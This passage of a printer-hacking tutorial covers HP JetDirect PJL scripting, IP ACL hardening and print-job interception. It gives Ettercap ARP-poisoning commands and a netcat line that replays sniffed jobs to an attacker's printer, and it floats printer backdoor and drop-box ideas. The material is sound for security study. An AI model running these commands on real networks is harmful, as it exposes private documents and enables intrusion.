pwd
ls
cd [directory]
mkdir [directory]
rm [file]
get [file]
put [local file]
append [local file] [file]
lpwd
lcd [directory]
session
timeout [timeout]
pause
pft>

PFT also has some limited scripting ability by piping in commands from a text file as this example shows:

Irongeek:/home/adrian/pjllib/pft# cat mypftscript.txt
server 192.168.31.213
connect
ls
quit
Irongeek:/home/adrian/pjllib/pft# ./pft < mypftscript.txt
PFT - PJL file transfer
FX of Phenoelit <[email protected]>
Version 0.7 ($Revision: 1.8 $)

pft> Server set to 192.168.31.213
pft> Connected to 192.168.31.213:9100
Device: HP LaserJet 4100 MFP
pft> 0:\
. - d
.. - d
PermStore - d
PostScript - d
PJL - d
saveDevice - d
cpbLog 5227 -
Fax - d
solution - d
webServer - d
FaxOut - d
FaxIn - d
pft>
Irongeek:/home/adrian/pjllib/pft#

Since Phenoelit provides the source code it could be an interesting project to write new automated tools for

extracting information from remote JetDirect boxes.

Using IP ACLs to restrict access

One of the few ways that HP gives you to lock down a printer is IP ACLs (Access Control Lists). Other network

printer manufacturers offer similar functionality. While the syntax may differ a little from JetDirect to JetDirect, the

basics are the same. On newer JetDirects you can use the web interface to restrict which IPs can connect to the printer

(normally you just want the CUPS or Windows print server to connect), but on almost all of them you can use the

Telnet interface to restrict which IPs can connect. This log should give you an idea of how the "acl allow: ip"

command is used:

Irongeek@Irongeek:~# telnet 192.168.1.22
Trying 192.168.1.22...
Connected to 192.168.1.22.
Escape character is '^]'.

HP JetDirect

Password:pass

You are logged in

Please type "?" for HELP, or "/" for current settings
> allow:0
> quit

===JetDirect Parameters Configured===

IP Address : 192.168.1.22
Subnet Mask : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server : Not Specified
Idle Timeout : 90 Seconds
Set Cmnty Name : butt
Host Name : NPI6D47B6
Default Get Cmnty : Disabled

DHCP Config : Disabled
Passwd : Enabled
IPX/SPX : Enabled
DLC/LLC : Enabled
Ethertalk : Enabled
Banner page : Enabled
User Quitting
Connection closed by foreign host.
Irongeek@Irongeek:~# telnet 192.168.33.22
Trying 192.168.33.22...
Connected to 192.168.33.22.
Escape character is '^]'.

HP JetDirect

Password:pass

You are logged in

Please type "?" for HELP, or "/" for current settings
> allow:192.168.19.56
> allow:192.168.20.0 255.255.255.0
> allow:list
Access Control List:
IP: 192.168.19.56 Mask: 255.255.255.255
IP: 192.168.20.0 Mask: 255.255.255.0
> quit

===JetDirect Parameters Configured===

IP Address : 192.168.33.22
Subnet Mask : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server : Not Specified
Idle Timeout : 90 Seconds
Set Cmnty Name : butt
Host Name : NPI6D47B6
Default Get Cmnty : Disabled

DHCP Config : Disabled
Passwd : Enabled
IPX/SPX : Enabled
DLC/LLC : Enabled
Ethertalk : Enabled
Banner page : Enabled
User Quitting
Connection closed by foreign host.
Irongeek@Irongeek:~#

Notice that if we now try to attach or port scan the JetDirect from an unauthorized host no connections can be

made to any of the ports:

root@ScanBox:~# nmap -A 192.168.1.22

Starting Nmap 4.00 ( http://www.insecure.org/nmap/ ) at 2006-03-16 21:30 EST
Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port
All 1672 scanned ports on 192.168.1.22 are: closed
MAC Address: 00:60:B0:6D:47:B6 (Hewlett-packard CO.)
Device type: general purpose|VoIP phone|broadband router|printer|print server|scanner|specialized|telecom-misc
Running: Alpha Micro AMOS, Clipcomm embedded, D-Link embedded, DEC TOPS-20, HP embedded, Liebert embedded, Nortel embedded, SMC embedded
Too many fingerprints match this host to give specific OS details

Nmap finished: 1 IP address (1 host up) scanned in 16.921 seconds
root@ScanBox:~#

It's generally a good idea to set up this kind of IP restriction as it can stop some forms of attack (though not

sniffing of print jobs using ARP poisoning).
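As an added example (mine, not part of the original article), here is a small Python helper that audits an "allow:list" dump like the one in the telnet session above: it parses the entries, checks that every print server you expect to talk to the printer is actually covered, and flags entries broader than a single host, since the usual goal is to admit only the CUPS or Windows print server. The listing text and print-server addresses are constructed for the example, and treating an empty list as "no restriction" is an assumption about how the JetDirect behaves after "allow:0" clears the list.

```python
import ipaddress
import re

# Shape of the "allow:list" output in the telnet session on this page:
#   Access Control List:
#   IP: 192.168.19.56 Mask: 255.255.255.255
#   IP: 192.168.20.0 Mask: 255.255.255.0
ENTRY_RE = re.compile(r"IP:\s*(\d+\.\d+\.\d+\.\d+)\s+Mask:\s*(\d+\.\d+\.\d+\.\d+)")


def parse_acl(listing):
    """Turn the text of 'allow:list' into a list of IPv4 networks."""
    nets = []
    for m in ENTRY_RE.finditer(listing):
        ip, mask = m.groups()
        # strict=False lets an entry with host bits set (e.g. 192.168.20.5 with a
        # /24 mask) still parse; the box applies the mask the same way.
        nets.append(ipaddress.IPv4Network("%s/%s" % (ip, mask), strict=False))
    return nets


def is_allowed(acl, host):
    """Assumption: an empty ACL places no restriction at all (the state after
    'allow:0'). Otherwise the host must fall inside at least one entry."""
    if not acl:
        return True
    addr = ipaddress.IPv4Address(host)
    return any(addr in net for net in acl)


def audit_acl(listing, print_servers, widest_ok_prefix=32):
    """Compare the ACL against the hosts that are supposed to print.

    Returns a dict with:
      'unrestricted' - True if the ACL is empty (anyone on the network can connect)
      'not_allowed'  - print servers the ACL would block
      'too_broad'    - entries wider than /widest_ok_prefix (whole subnets when
                       only one or two print servers need access)
      'unexpected'   - entries that cover none of the listed print servers
    """
    acl = parse_acl(listing)
    return {
        "unrestricted": not acl,
        "not_allowed": [h for h in print_servers if not is_allowed(acl, h)],
        "too_broad": [str(n) for n in acl if n.prefixlen < widest_ok_prefix],
        "unexpected": [
            str(n) for n in acl
            if not any(ipaddress.IPv4Address(h) in n for h in print_servers)
        ],
    }


# Constructed listing (copied shape of the session above) and constructed
# print-server addresses for a stand-alone run.
SAMPLE_LISTING = (
    "Access Control List:\n"
    "IP: 192.168.19.56 Mask: 255.255.255.255\n"
    "IP: 192.168.20.0 Mask: 255.255.255.0\n"
)

if __name__ == "__main__":
    print(audit_acl(SAMPLE_LISTING, ["192.168.19.56", "192.168.1.5"]))
```

Paste the printer's own allow:list output into the listing string and pass the addresses of your print servers: anything in not_allowed means a legitimate server will be cut off once the ACL is enabled, and anything in too_broad or unexpected is a candidate for tightening.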

Don't forget to look for Stored Documents via the web interface

I'm mostly putting this here because of the Ricoh Savins I've played with, but it's good advice for HP printers

too. Look for Stored Documents via the web interface on the printers you find; many times users will save print jobs

and faxes where they can be accessed from the web without even realizing it. I've found quite a few things this way in

the past while performing audits.

Coding your own scripts with PHP, Perl and PJL

I thought some of you might be interested in writing your own scripts to change the printer display, or other tasks

involving PJL. First, read some of the PJL references linked in the reference section, then play around with telnetting

in and issuing the PJL commands directly. You will notice that there are quite a few that can be used to query the

status of the printer:

Irongeek:~# telnet 192.168.1.33 9100

Trying 192.168.1.33...

Connected to 192.168.1.33.

Escape character is '^]'.

@PJL INFO ID

@PJL INFO ID

"LASERJET 4000"

@PJL INFO STATUS

@PJL INFO STATUS

CODE=10001

DISPLAY="Ready"

ONLINE=TRUE

@PJL INFO PAGECOUNT

@PJL INFO PAGECOUNT

536225

@PJL INFO MEMORY

@PJL INFO MEMORY

TOTAL=2526160

LARGEST=1204208

telnet> quit

Connection closed.

Irongeek:~#


I decided to use Perl for my examples since it's easy to use, multiplatform and pretty easy to do sockets with. Most

*nix systems should have Perl already; if you use Windows, download and install ActiveState's ActivePerl from here:

http://www.activestate.com/Products/ActivePerl/

Another useful resource is the "Printer Job Language Technical Reference Manual", which can be found at:

http://lprng.sourceforge.net/DISTRIB/RESOURCES/DOCS/pjltkref.pdf

Read it and learn what can be done with PJL. Here are two links that may help you understand Perl and socket

programming:

http://www.perlfect.com/articles/sockets.shtml

http://www.rocketaware.com/perl/perlipc/TCP_Clients_with_IO_Socket.htm

Here are a few quick Perl scripts. This first one just lets you set the LCD display on a JetDirect enabled HP

Printer:

#!/usr/bin/perl -w
#File name: lcd.pjl.pl
#From http://www.Irongeek.com [email protected]
#Script to set the LCD display on an HP JetDirect printer
#Syntax: ./lcd.pjl.pl <ip-of-jetdirect> "Some Message"
use IO::Socket;
$ip = $ARGV[0];
$lcdtext = $ARGV[1];
my $sock = new IO::Socket::INET (
    PeerAddr => $ip,
    PeerPort => '9100',
    Proto    => 'tcp',
);
die "Could not create socket, Monkey boy! $!\n" unless $sock;
# UEL (ESC %-12345X) switches the printer into PJL, then RDYMSG sets the ready message
print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"$lcdtext\"\n";
print $sock "\e%-12345X\n";
close($sock);

Sometimes the above version does not work, so try:

#!/usr/bin/perl -w
#File name: lcd.pjl.pl
#From http://www.Irongeek.com [email protected]
#Script to set the LCD display on an HP JetDirect printer (variant without the UEL sequence)
#Syntax: ./lcd.pjl.pl <ip-of-jetdirect> "Some Message"
use IO::Socket;
$ip = $ARGV[0];
$lcdtext = $ARGV[1];
my $sock = new IO::Socket::INET (
    PeerAddr => $ip,
    PeerPort => '9100',
    Proto    => 'tcp',
);
die "Could not create socket, Monkey boy! $!\n" unless $sock;
print $sock "\@PJL RDYMSG DISPLAY = \"$lcdtext\"\n";
close($sock);

It would seem that sometimes the escape character (27 dec, 1B hex, 033 oct) and "%-12345X" is needed and

sometimes it's not. It appears from my reading that it's only needed for UEL (Universal Exit Language) commands. I'd

like more details on when it has to be used and when it does not, email me if you know.
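The telnet session above shows the INFO queries, and the two Perl variants differ only in whether the UEL sequence is sent. As an added example (mine, not from the article, and in Python rather than the Perl the article uses), here is a client that frames each query in UEL, reads the reply up to its terminating form feed and parses the two reply shapes seen in the session (KEY=VALUE lines, or a single bare value), so the same queries can be used to build an inventory of which printers answer PJL on 9100/tcp without any authentication. The sample replies embedded in the comments are taken from the session above; the host name passed on the command line is an assumption.

```python
import socket

# Universal Exit Language sequence: ESC % - 1 2 3 4 5 X. Sending it first makes the
# printer leave whatever language it was in and listen for PJL.
UEL = b"\x1b%-12345X"


def build_pjl_query(command):
    """Frame one PJL command (e.g. "INFO STATUS") in UEL so the printer
    interprets it as PJL regardless of the state the last job left it in."""
    return UEL + ("@PJL %s\r\n" % command).encode("ascii") + UEL


def parse_pjl_info(raw):
    """Parse the reply to a PJL INFO query into a dict.

    Reply shapes, as seen in the telnet session on this page:
        @PJL INFO STATUS\\r\\n CODE=10001\\r\\n DISPLAY="Ready"\\r\\n ONLINE=TRUE\\r\\n \\x0c
        @PJL INFO ID\\r\\n "LASERJET 4000"\\r\\n \\x0c
    KEY=VALUE lines become dict entries; a bare value lands under "value".
    A form feed (0x0c) terminates every reply.
    """
    text = raw.decode("latin-1").split("\x0c", 1)[0]
    lines = [ln.strip() for ln in text.replace("\r", "").split("\n") if ln.strip()]
    if not lines or not lines[0].upper().startswith("@PJL INFO "):
        raise ValueError("not a PJL INFO reply: %r" % raw[:40])
    parsed = {"category": lines[0].split(None, 2)[2].upper()}
    bare_values = []
    for ln in lines[1:]:
        key, sep, value = ln.partition("=")
        if sep:
            parsed[key.strip().upper()] = value.strip().strip('"')
        else:
            bare_values.append(ln.strip('"'))
    if bare_values:
        parsed["value"] = bare_values[0] if len(bare_values) == 1 else bare_values
    return parsed


def query_printer(host, command, port=9100, timeout=5.0):
    """Send one INFO query over AppSocket (9100/tcp) and return the parsed reply.
    Reads until the terminating form feed or until the socket goes quiet."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_pjl_query(command))
        while True:
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
            if b"\x0c" in chunk:
                break
    return parse_pjl_info(b"".join(chunks))


def inventory(host):
    """Run the queries shown on this page and collect them into one record,
    keeping the error text for hosts that refuse (ACL) or answer with non-PJL data."""
    record = {}
    for cmd in ("INFO ID", "INFO STATUS", "INFO PAGECOUNT", "INFO MEMORY"):
        try:
            record[cmd] = query_printer(host, cmd)
        except (OSError, ValueError) as exc:
            record[cmd] = {"error": str(exc)}
    return record


if __name__ == "__main__":
    import sys
    # host name or IP is an assumption: python3 pjl_inventory.py 192.168.1.33
    for cmd, reply in inventory(sys.argv[1]).items():
        print(cmd, reply)
```

A printer that answers INFO ID to an arbitrary host is one that also accepts RDYMSG and file-system commands from that host, so a row of successful replies in the inventory is the cue to put the IP ACL from the previous section in place.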

This script just sends a simple line of text to the printer directly:

#!/usr/bin/perl -w
#File name: print.pjl.pl
#From http://www.Irongeek.com [email protected]
#Script to send a simple line of text to an HP JetDirect printer
#Syntax: ./print.pjl.pl <ip-of-jetdirect> "Some Text To Print"
use IO::Socket;
$ip = $ARGV[0];
$texttoprint = $ARGV[1];
my $sock = new IO::Socket::INET (
    PeerAddr => $ip,
    PeerPort => '9100',
    Proto    => 'tcp',
);
die "Could not create socket, Monkey boy! $!\n" unless $sock;
# raw text goes straight to the printer's default language interpreter
print $sock $texttoprint;
close($sock);

This one does a countdown on the LCD screen, then ends with a bang:

#!/usr/bin/perl -w
#File name: selfdestructlcd.pjl.pl
#From http://www.Irongeek.com [email protected]
#Script to send a countdown to the printer's LCD, ending in a Bang.
#Syntax: ./selfdestructlcd.pjl.pl <ip-of-jetdirect>
use IO::Socket;
$ip = $ARGV[0];
my $sock = new IO::Socket::INET (
    PeerAddr => $ip,
    PeerPort => '9100',
    Proto    => 'tcp',
);
die "Could not create socket, Monkey boy! $!\n" unless $sock;
for ($i = 30; $i >= 0; $i--) {
    print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"Self Destruct in $i\"\n";
    # echo the same command locally so you can follow the countdown
    print "\e%-12345X\@PJL RDYMSG DISPLAY = \"Self Destruct in $i\"\n";
    sleep 1;
}
print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"Bang!!!\"\n";
sleep 5;
# put the normal ready message back
print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"Ready\"\n";
print $sock "\e%-12345X\n";
close($sock);

I know some of you want the script that lets you make a printer web cam like the one I had up for a short

while. You can download the PHP source code here:

http://irongeek.com/downloads/printeraction.txt

If you write any interesting scripts send them to me and I'll post them with your credits. Happy scripting!

Fixing a busted hard drive with Ghost

Matthew Hinton (info [at] fireshadow.net) sent me some details on fixing a broken hard drive in an HP 4100

MFP with Ghost; it could be useful to quite a few of you if your printer is out of warranty:

Don't know if you'd be interested in the details for your page or not.

Where I work at we've been able to make a ghost image of the 4100 MFP hard

drive load. This allows us to put it on new hard drives to reinstall in

the EIO slot. What drove us to this insanity is as follows.

We have about 10 or so of the 4100 MFP's here. After the warranty

expired, they started getting the same error - "49.FF81 error" on the

display. Pretty much it's a new EIO hard disk. HP has a procedure that

may or may not work to reset it. $49 to talk to a tech over the phone

since it's out of warranty. $345 for a new EIO disk from HP. Local guy

wants $515 to come out with a new disk to fix it.

Taking apart the bad one, we noticed that it's a standard Toshiba 20 Gb

laptop hard drive. The PC tech went and got a known good EIO hard disk,

and we made a ghost image of it. We tried sending the ghost image back

over to the bad drive, but got a "drive too smal error". The ghost image

took fine on a Seagate 40 Gb notebook drive. Put the Seagate drive on

the controller card, reinstalled and it's working fine.


Anyway, thanks for putting up the informative page. I'm using Hijetter

right now to look at the variables on the printer.

Sincerely,

Matthew Hinton

Sniffing print jobs and replaying them

How often do folks print things and think that as long as no one gets hold of the hard copy there's no security risk? As

it turns out, sniffing print jobs is pretty easy if you can get on the same LAN segment as the printer or print server.

Since the print jobs are not encrypted, sniffing and reprinting them to your own printer is comparatively a breeze if

you know how. This example shows how to sniff between a Windows 2003 based print server and a JetDirect or Ricoh

Savin based network printer that uses AppSocket (port 9100/tcp) for communications, but the principles should apply

to other setups as well.

1. First we have to pull off a MitM (Man in the Middle) attack by ARP poisoning the JetDirect box and the Windows

print server and saving the packets to a Pcap file. I'll use Ettercap on a Linux box to do this, but other apps may work

as well. To pull it off I will use the following Ettercap command:

ettercap -T -q -w print.dump -M ARP /192.168.1.2/ //

where 192.168.1.2 is the IP of my network printer. Note that this will cover all of your bases, but can cause one hell

of an ARP storm since Ettercap has to ARP poison every host on the subnet. In some cases it might be better (and

faster) to just ARP poison between two hosts you know the traffic will be going through. Here is an example:

ettercap -T -q -w print.dump -M ARP /192.168.1.2/ /192.168.22.47/

where 192.168.1.2 is the IP of the network printer and 192.168.22.47 is the IP of the Windows/*nix print server or PC

sending the print job. Hit the "q" key at any time to stop the ARP poisoning and sniffing.

2. Now that we have our Pcap (also sometimes called a libpcap or tcpdump file) we have to open it up in Ethereal.

Just use the File->Open menu and point it to the print.dump file made by Ettercap.

3. Once print.dump has been opened in Ethereal we need to filter it. Enter the following filter and hit Apply:

tcp.flags.syn == 1 && tcp.dstport == 9100


4. As you see from the screen shot above, the filter got rid of a lot of the extraneous data. These four packets represent two print jobs, or at least the beginnings of them. Packets number 158 and 159 are part of the same print job. Packets number 510 and 511 are part of the 2nd print job. What we want to do now is right click every other packet, starting with the first, and choose "Follow TCP Stream".


5. Once you have chosen "Follow TCP Stream" you should see a window something like the one above. Set the drop

down box to only show the traffic destined to the network printer as shown above. Set the data type to RAW and

then click the "Save As" button and call the output file something like "test1.job".

6. Repeat steps 4 and 5 for every other packet to get all of the print jobs captured.

7. At this point we could open up "test1.job" in a text editor, and if it's a PostScript file, remove every line before:

%!PS-Adobe-3.0

and after:

%%EOF

to create a .PS file (PostScript) that could be opened up in GhostView on a *nix box. You might be able to do

something similar with a PCL based print job, but I have not figured out what parts to remove yet. As it stands we can

leave "test1.job" as it is, whether it's PCL or PostScript, and send it to the printer by replaying it with NetCat to a

network printer we control. The command is quite simple:

cat test1.job|netcat -q 0 192.168.1.2 9100

where "test1.job" is the sniffed print job we want to replay and 192.168.1.2 is a network printer that we control. If the

Netcat command seems too complex you could also just use an FTP client and FTP the captured print jobs to a

JetDirect enabled printer (assuming FTP is enabled on the JetDirect box).

All this seems a bit complicated I know, so I'm thinking of asking the Cain team to add this functionality to their

app to make it easier.
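As an added example (mine, not from the article), here is a Python triage helper for a job saved with "Follow TCP Stream" as described in steps 5 to 7: it lists the @PJL lines the print server sent in the clear (job name, language), automates the trimming of step 7 for PostScript jobs so you end up with a plain .ps file for GhostView, and reports when a job is PCL and should be left as it is. The two sample streams are constructed for the example, not captured from any real printer. Running it over a capture taken on your own network is a quick way to show an auditor exactly what a sniffer on the segment gets to read.

```python
import re

UEL = b"\x1b%-12345X"        # Universal Exit Language: ESC % - 1 2 3 4 5 X
PS_START = b"%!PS-Adobe"
PS_END = b"%%EOF"


def pjl_header(job):
    """Every @PJL line in the stream (job header and trailer), decoded."""
    return [ln.decode("ascii", "replace") for ln in re.findall(rb"@PJL[^\r\n]*", job)]


def job_language(job):
    """Language the printer will switch to after the PJL header.
    Uses the explicit '@PJL ENTER LANGUAGE=...' when present, otherwise sniffs
    the data: PostScript starts with %!PS, PCL jobs start with ESC E (reset)."""
    m = re.search(rb"@PJL\s+ENTER\s+LANGUAGE\s*=\s*(\w+)", job, re.IGNORECASE)
    if m:
        return m.group(1).decode("ascii").upper()
    if PS_START in job:
        return "POSTSCRIPT"
    if b"\x1bE" in job:
        return "PCL"
    return "UNKNOWN"


def extract_postscript(job):
    """Step 7 of the procedure above, done programmatically: keep the bytes from
    '%!PS-Adobe...' through the line holding '%%EOF', dropping the UEL/PJL wrapper,
    so the result is a plain .ps file. Returns None if the job is not PostScript."""
    start = job.find(PS_START)
    if start < 0:
        return None
    end = job.find(PS_END, start)
    if end < 0:
        return None
    end += len(PS_END)
    for nl in (b"\r\n", b"\n"):          # keep the line terminator after %%EOF
        if job.startswith(nl, end):
            end += len(nl)
            break
    return job[start:end]


def triage(job):
    """What a responder wants to know about one captured 9100/tcp stream: which
    PJL metadata leaked and whether the document itself is readable cleartext."""
    header = pjl_header(job)
    ps = extract_postscript(job)
    name = None
    for ln in header:
        m = re.match(r'@PJL JOB NAME\s*=\s*"?([^"\r\n]*)"?', ln, re.IGNORECASE)
        if m:
            name = m.group(1)
            break
    title = None
    if ps:
        m = re.search(rb"%%Title:\s*([^\r\n]*)", ps)
        title = m.group(1).decode("ascii", "replace") if m else None
    return {
        "language": job_language(job),
        "pjl_lines": header,
        "job_name": name,
        "document_title": title,
        "postscript_bytes": len(ps) if ps else 0,
    }


# Constructed sample streams (not captured from a real printer): the shape of a
# raw "Follow TCP Stream" save for a PostScript job and for a PCL job.
SAMPLE_PS_JOB = (
    UEL
    + b'@PJL JOB NAME="quarterly_numbers.doc"\r\n'
    + b"@PJL SET RESOLUTION=600\r\n"
    + b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n"
    + b"%!PS-Adobe-3.0\n%%Title: quarterly_numbers.doc\n%%Pages: 1\n"
    + b"/Helvetica findfont 12 scalefont setfont\n"
    + b"72 700 moveto (Confidential) show\nshowpage\n%%EOF\n"
    + UEL
    + b'@PJL EOJ NAME="quarterly_numbers.doc"\r\n'
    + UEL
)
SAMPLE_PCL_JOB = (
    UEL
    + b'@PJL JOB NAME="memo.txt"\r\n@PJL ENTER LANGUAGE=PCL\r\n'
    + b"\x1bE\x1b&l0O\x1b(s0p12h10vsb4099THello\x1bE"
    + UEL + b"@PJL EOJ\r\n" + UEL
)

if __name__ == "__main__":
    import sys
    # file name is an assumption: python3 job_triage.py test1.job
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PS_JOB
    print(triage(data))
```

Writing the bytes returned by extract_postscript to a file gives the .ps that step 7 describes; for a PCL job the function returns None and the original "test1.job" is what you keep.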


A note on Plain-text authentication protocols

Many of the above attacks are only possible because people don't enable passwords on their network printers.

However, even if passwords are enabled they could still be sniffed pretty easily since most network printers use

simple telnet or a web interface without SSL to configure the system. Both telnet and HTTP (without SSL) passwords

can easily be sniffed with packages like Ettercap, Cain or Dsniff. Some newer network printers, such as the HP

Jetdirect en3700 (J7942A), can use SSL with their web interface (albeit with a self-signed certificate) and the

interface seems to be more than just a Java applet for using SNMP to control the Jetdirect. This is a much more secure

option than the older Jetdirects that used unencrypted HTTP and SNMP v1/v2.

Other Ideas

There's still a lot more out there I need to research and play with when it comes to hacking network printers. As

with most of my projects this is a work in progress so feel free to email me your ideas. A few interesting topics might

be:

Using Phenoelit's ChaiServices information to create worms, backdoors and other malware for HP JetDirect printers.

Modifying the PFT source code to make automated apps for searching an IP space and pulling files off of the network printers.

Vulnerabilities in network printer implementations like buffer overflows and such.

Hacking the firmware in JetDirects to create dial home (shell shoveling) drop boxes that could be left behind on target networks to help with intrusions. For those wanting to help, install the HP Download Manager and look in "C:\Program Files\Hewlett-Packard\HP Download Manager\Upgrades\jetdirect" for the vendor firmwares.

Tracking Dots: http://www.eff.org/Privacy/printers/list.php

Also don't forget to check out SecurityFocus' online vulnerabilities database (http://www.securityfocus.com/) to

see if your particular network printers have any outstanding issues. I know they have a few issues listed for some of

the JetDirect boxes. While you're at it, check for vulnerabilities in the base OS that the network printer uses,

VxWorks in the case of some JetDirects and NetBSD for the Ricoh Savins.

I hope you have found this article interesting. If you have any ideas or comments please feel free to e-mail me.

Happy printer hacking.

Links to Tools:

HP Web JetAdmin (without registering)

http://www.svrops.com/svrops/dwnldprog.htm

HP JetAdmin for Windows 2000 3.42, the last version to be released

http://www.helpdesk.umd.edu/os/windows_nt/printing/674/

HP Download Manager (for upgrading firmware)

http://www.hp.com/go/dlm_sw

Ghostscript, Ghostview and GSview

http://www.cs.wisc.edu/~ghost/

SmartDeviceMonitor

http://www.ricoh-usa.com/products/product_features.asp?pCategoryId=19&pSubCategoryId=46&pCatName=Solutions&pSubCatName=Device%20Management&pProductId=67&pProductName=SmartDeviceMonitor&tsn=Ricoh-USA

Foundstone's SNScan (find network printers that use SNMP, which seems to be most of them)


http://www.foundstone.com/resources/proddesc/snscan.htm

SoftPerfect's NetScan (also useful for scanning for SNMP services)

http://www.softperfect.com/products/networkscanner/

Silicosis' HP Printer Display Hack

http://www.irongeek.com/i.php?page=security/hphack

Irongeek's GUI HP Printer Display Hack

http://www.irongeek.com/i.php?page=security/jetdirecthack

IPIterator

http://www.irongeek.com/i.php?page=security/ipiterator

Hijetter

http://www.phenoelit.de/hp/download.html

Ettercap

http://ettercap.sourceforge.net/

Ethereal

http://www.ethereal.com/

NetCat

http://netcat.sourceforge.net/

Net-SNMP

http://net-snmp.sourceforge.net/

Media:

Here's a collection of videos and other media on Network Printer Hacking you might be interested in:

Network Printer Hacking: Irongeek's Presentation at Notacon 2006

http://irongeek.com/i.php?page=videos/notacon2006printerhacking

Slide and other resources from the above presentation

http://irongeek.com/downloads/notacon2006.zip

Infonomicon TV Ep 7

http://irongeek.com/i.php?page=videos/infonomicontv7

Useful links for further research:

Common print server port numbers

http://members.cruzio.com/~jeffl/sco/lp/printservers.htm

HP's guide to securing JetDirect printers

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj05999

Understanding, Reversing, and Hacking HP Printers by Slobotron

http://www.searchlores.org/realicra/hp_slobo.htm

SecurityFocus' online vulnerabilities database

http://www.securityfocus.com/

Network Printers and Other Peripherals -- Vulnerabilities and Fixes by Dennis Mattison (Littlew0lf)

http://members.cox.net/ltlw0lf/printers/index.html

older version: http://freshmeat.net/articles/view/445/

Securing Network Print Jobs - An LRS White Paper

http://www.lrs.com/EOM/Solutions/Papers/secure.aspx


Printer Job Language Technical Reference Manual

http://lprng.sourceforge.net/DISTRIB/RESOURCES/DOCS/pjltkref.pdf

Printers, Proxies and Pranksters An April Fool's Recipe for Fun by Kellegous

http://web.kellegous.com/scratch/2003/printers1KBXB/

RICOH Aficio 2035 "security'' by mslaviero

http://www.cs.up.ac.za/cs/mslaviero/archives/2005/04/28/ricoh-afficio-2035-security-or-lack-thereof/

Special thanks to Nancy for proof reading and making my English intelligible.

Change Log

02/06/2007: I've updated info on the fix for the Pharos cached print job vulnerability

01/20/2007: HP seems to have released a fix for the FTP DoS problem. See the Printer DoSing section.

01/10/2007: Fixed and added some links in the Printer DoSing section.

01/06/2007: Add information on the Joxean Koret attack to the Printer DoSing section.

04/18/2006: Added link to a newer version of Littlew0lf's article.

04/10/2006: Added Media section.

04/02/2006: Added a bunch of information for my presentation at Notacon 2006

Added section: Stupid Printer Tricks

Added section: Finding info about the printer using SNMP tools.

Added section: Finding Printers with Google.

Added section: RSH commands and Richo Savin Aficio Printers.

Added section: Spamming Printers.

Added section: Getting a JetDirect password remotely using the SNMP vulnerability

Added information about SSL with newer Jetdirects to A note on Plain-text authentication protocols and

JetDirect password notes sections.

Added information on SmartDeviceMonitor to Finding Network printers using Nmap and SNMP tools

and Finding info about the printer using SNMP tools as well as adding screenshot of the SNMP tools

mentioned. I also added some details on finding network printers via their MAC address.

Added information on holding a connection to port 9100/tcp to DoSing the network or the printer.

Added information on IPX/AppleTalk/SMB to Intro to the concepts.

Added alternate Perl script and added PHP web form to Coding your own scripts with PHP, Perl and

PJL.

Added HP firmware location to Other Ideas.

01/18/2006: Added section on Fixing a busted hard drive with Ghost.

09/14/2005: Found another missing image, the LCD Display icon from Hijetter. It's fixed now. I also added a link

suggested by Dick from Hack A Day.

09/14/2005: Hack A Day added a link to this site and I noticed that the Hijetter file system image was broken. It

should be fixed now.

09/13/2005: Added "Coding your own scripts with Perl and PJL" section.

09/11/2005: First posted.

Irongeek's Notes For Later:

nano /etc/init.d/sysklogd

-r

LAND attacks


If you would like to republish one of the articles from this site on your webpage or print journal please contact

IronGeek.

Copyright 2007, IronGeek
